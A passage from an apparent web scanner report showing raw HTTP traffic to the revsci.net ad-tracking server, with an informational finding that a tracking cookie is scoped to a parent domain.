NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_N0iX="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe35M/k8qdp71BIcXCRw70aR2HbLECjMiOiDpnm4+THB2n3Izr6D7K9zJkmRgo3N7QS9wiGs3s+NzEc9qx+jF1HGbngjWMvr5N3tT+pt9g9D7ul+h8eFPJLolTo0tKbm1Idyaa/gRHHlygVF4B6xqOJLcEvHgmj/d1mYy2b3f4k/S9SZde0KenU/4ikGRg14MiyNBZHB5HvVZsX2bs1S7a6KvIT/WU0DkJ0ehxILEr6Yzi9hOpfBruxdCZE6I4XuOJn+3FZq54MpogVP/Nr/MsIouTQm29f/hAsNVCe5i62f7DFjwciN/C3JHt4mBADQueHmB19tfCQ8WFljzxgVgZMS+INSvyyz6ve5yoeNMw4HQiErYCKpH73Eg6MAbEr36fSX5enLNSdiRZ1OK1xJrR7d296Pp4CpKzID/zxowtyvdpvb+Fg1lKGLf1AjRa7X5q9AVHgq3XQU4E/i6vTwegq5MV8cSYp8baqx6lbD2UdNV8OSJETEaCY5DRtVjs0OL3OBmWOjukYtq/Mayma8wmKYKEivS4Ay9y85lXH5W2dAE5oEVVnfBGWCG6Nkb3texrKC2+byBnQdn3JB1SnQkIe1SFVjDdN87LgLLfjZi/FBhX+fBtR5Crn3XfbpW53hgZMUdRPiLbk0T5NEYCzsAdnUa+VU8+97VZmeNhrYmjxiEw4FNbCLDiJXErw7e8axUeAM3ML1w19HIRhvyP8wPE8HNkzC4c1ahdJpY33Mn2RBkbXbL3JQy67xkMuG8f+kSiCr8UaGwPdSx8eiRO/zt5yV54RTEexM9JLhPqEbzMtgrMnESRXkyopFYad0bAvSQL7xQg28bW/jxPV3rhLxoqswkmAMke3ZDstRMry3fFXeyhmJEl7W1qlShqDPhZuf5ldLzNWXZH0EQriLLVb8f3sCgDULdPpklc4Wu4ByeEMyDeboQjr7oIU/lnJmPFhTfO+4g84CiB0cuCF0BaDlNg2KsqWueSpxPBWtnW7SbhcbqpXeT1x1rdyFfIfYWndQVtkqddTChIK+G+6pUlBtfwn8T0qPjVWxK+IBseBLK/DgIFKrZiTrLmZtlzpHOgxsOlCKlGg/IR+ujF4UFMzHsitxKTRcnDwXb0BACZA2nEqPCh+NITOxu2qWUDS+zh2lR0RmynjkgQUFc7mjOiQLSd6fj8EuyhEsCvF4+XSllVtkU/mIjhmGg6WKAwY9UaugjDrXuwns1yMx4RS2x0kkCNX5fDT4KK0SAM6ZzRzPCcM/+hZWFXSWNV/QRVQ3Hy/sEYqf0Xo5mEobL9qRdZHbYD8XDaIHCJaB5mz1aXyrSFI+8RS"; rsi_us_1000000="pUMN4y+nMBYULQEQO7/+agzaymK59vZiJkFr2VpXgkC+Jr7XRa3zgy48YM/Hg5qLS0B1HXZ0JYbKawIdpl8JoodzwdD3toDJu3OqvQrfUAeGDUoy6EJuSDSDvlpAyptadahprzNopjNlmRy/7GI6GUKuBD+MRdX+SelIosexWxxg+6pjwxPVHTz3zcRN14Y16O4URQTHnSaTYro/RoXYie5MI50gm/iFZVcz3uuJinra4QutDnoSFNDREea6nCgCr828aTS7zzCBojCdTqzd1PhCKdcG8CU51WYftICb6V0ZlnYF9EyB5Vp9g9vCDB0QI2HxcbSa+5KEl3jKCiMjN2U14zgswm4uqB97kb8RIEAXL6kMQguxVmt59rl8bUbMEHiltuiaEAtw27H+wT8abY66x1SOA1b/0tmPo0MAGPYbB2y+yQqiU3rFiNheJUt193bsZdSgagF73yUnJ6Q5GrOUgexKl7om2TewxkVDIbJrTMum2OFVTDZT81mVbl6QWU43/R0TOW3w6phfqG1twbn6Xc26/g8uUnBO24sxZUviXh7J4+bh+fZBrgsxxVWCkz3UHGCdW5gu8xl+S5lSVSzC68EQLryJ2kL/I+nw/dzfYJRZ4rV3n+z1mPC4RG2sCPSKnvojwQRJvEoODehYR8wCJfnYJfqPhhc1MPBCWef7k8XkSvDyEDPplJ53QRJyB0Bcu7yP31NiKbL83+E9k+I3h8rF4cazcyzNmU5YRZJEOJbPhtFogd6T2rYuQrEWe0MqFjU+jGpoyzSMCTBMG4Cg92RikJ9i90dX+ImDIzEyQmqvobggZ99Idp+nhfFJ1pTAAsoiqZ7yeAr63HMQwwvixvFawd1s/H9g7OUBg2n8/mbc6kdDdOZ+6903QZtAZrdukSTVml0tPpIT+DjDAQNHDnDaSDkLldBtCeyrqqeREUTix7tsuh4u/5G81kgGX9QreEKfdBIpIp+DkBVtq/AFYqt1rtaRtT45/gkc+iLrX2A/cjC53QYgqp+FxD9IpEWchacF+1bg7KhbbF+P6m8TZNnW2WKnKFugeqQDLabwu+SfYovFkpitNY9HN9lqAJA35F2ghbHGw/yIu/W0Mo8UgeCA0qttIBpTyxZ4M9TCPKtmQ31Gs/QnXBF1iSU96WKXpWqSzEyXfFGTSycGsVURXHece/8SLTTrGve4EBZi8XrRerU5RPZuVQnagJiZp/mD5dYXjlRMBoClGY4Or+wJkd4BLAmsmd5JRS5sB5HdaB374Sgpw2VgUJX9Sv/Lrgg+46ug+YQwbmiygD05/4MX8y5P6sgMhCf1JrayAlpUMxVo4W0oh2CB7dSVIj2hugK9p4+z0MVUFV1om09IdoxE/Y4ROVxVRtGIlnYg6gsbaFzV0EzBG9xiw0ojOpNKw0YsDPqlt8Lkw2Xg5BUinF+VFde/nERIaxUQUQZg46ne/R9HNmyEBOgzpaRd/FyIlP0JVPWui12vquSDoJkHkj/YJ3BST6YNVAcDXnEbzIDa3eStPGY2W/5GdMzfdR2tIGrbO4kUVYZhakJuOVvP7IQ7IVz9VX/CzGcGsP3UlD3DZuG1vO21gynVk/WjFsT4C/wOD3On8yme8RK91Us9rM9myMVUPllKwPfckJq+O/RIQZLlT9uoMmCPrReL9VRZ8aFe/rG2ns3OLeYpXD+gCX5VrKcVTIv9WdfzJQg7RVqxjTKWtONAFV8pCBtdk7Gilsy60VQx6DtqN8xYKP39Xd1j9ai21X6B93o2ydzSus2xH+b10DcbStB87uWEHGZbQtUj"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizbJzcL1/BDTbCT3otbvrJpaz9MKitAMGD7ImCg6VhtWruRebHA3/LDkToXvABg1h+tmC6pzN57K4ztynavS1TXkjyPXb4prWAJZ2EJkRmrkbexC3ZQMvV50ZtyNv/CzYfZ4IS/mB5au3BkTI0M9KmNG+iFwp2RGN4K+YxJpNj4RWgTOkpogdVk/8l14dqokFEawHSmr4/07SMich9Gsc+chNI7CdhAm36YGqdeiwZSlnNgSfG/UD6Xyrjm+a/t7DZr580lhNC5v3W6hmTP7VqtETJt/5jcHF7w4hNkdQpNMryvMW8Xi9V7j/QxeTUf0w

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQm8locHcCtpU+w6+9L5G+51oBVUZ75smbLZJtOP/GjGxMTb2WDbVjI5teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa0ATFgWdPtKIFHNv4PL1RUaJzrH2RPUn/Xqe14cyhPjKhpKHCwKDiLN7ZpoTqEYsuFKuRBu2IqoSVy/5t1vlVo6PLHFjL00+ehAJFHVwaNKdWI3SWQJ9zzYJE3gOggYzS8l60cF2fThYKZWrEcWW0BvTeT4FW1ruM7/GaXYHlxlcxlY9e55vKxtpoLjzvvQQaHTPh0X0eya3DxMPDEKTB7ClAkJ3WaqRODPcKx/IuH584RkrsmRfc3CFuvdQc0Syy+EOVpga9Cu2Xug1fvFX09UyjpIf1CPZg+MO8wDnyDEevJoubP5q5X3Lq6ZiemknQeXxBEDacfeaEMQXdpBhlOxi8v9qsbVInoJQonM0vTfQQpah4iS4oUHt1+jp8Byyj3g4i4gWPGhmo9uQu30piYpJ6rKG2SBlvK3zJDw2m8WCPhtshtALXAv2bHK8p7f2YFxvlhHegoqbRiuVkn648ssnvenZ8GBjgQycrYza/h6YBb3rWnciO7z0O5BtFcOnuBk0rszDsvXmWGiLJUNhN0PeyhlURoDg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:11:01 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:11:01 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.142. http://pix04.revsci.net/I10985/b3/0/3/1008211/298241288.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/298241288.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+3QQxDDLIL4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGGVl/GdrOMZ/Y+D7DfFcJwE0NOQgtTXZ9dBXUlcd9Q/LtscVIqyW2v6s6iEhJeU8h9plWnekIohe7OqAUbNvDCQtVo1G6MP6VyyS5g/+R8CD4MNKTYYCqGMEVIWz+D0TSTE0xZdhpXd5uEGsYPs9a9DXiMU8QmAUwmcjd7W1GD5QQZOLlE8qZfxFeqiNuC1rBBItAl4Lntw6epFmD3xl1j5XMDlVX6aYKz9oKlGfwpIOEBVqqGVszIH728YaXNXBQJH5nKo4LB4ZFQpZu0JgRyk3dLYnNoOEpwwwYhyVv5CzYfdhF5MklDiZU+qfBs8iY3onXUAmhjxJL4K+A0XA8VLf7k4sc/0JZ8J48f0ieKvzBYmvkKhNNBEt+pfLsa64tp+Cq8rP8l9q1ab2Ks+lDPElWMSSTGMEs1zAQP2ma/t6XcuNTy3hG0Buuc42p2xc7IDD4/1U6MzVmWiTrAgBaH0BC9+6OqgKdS3rUQQ867v0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:43:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/298241288.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNej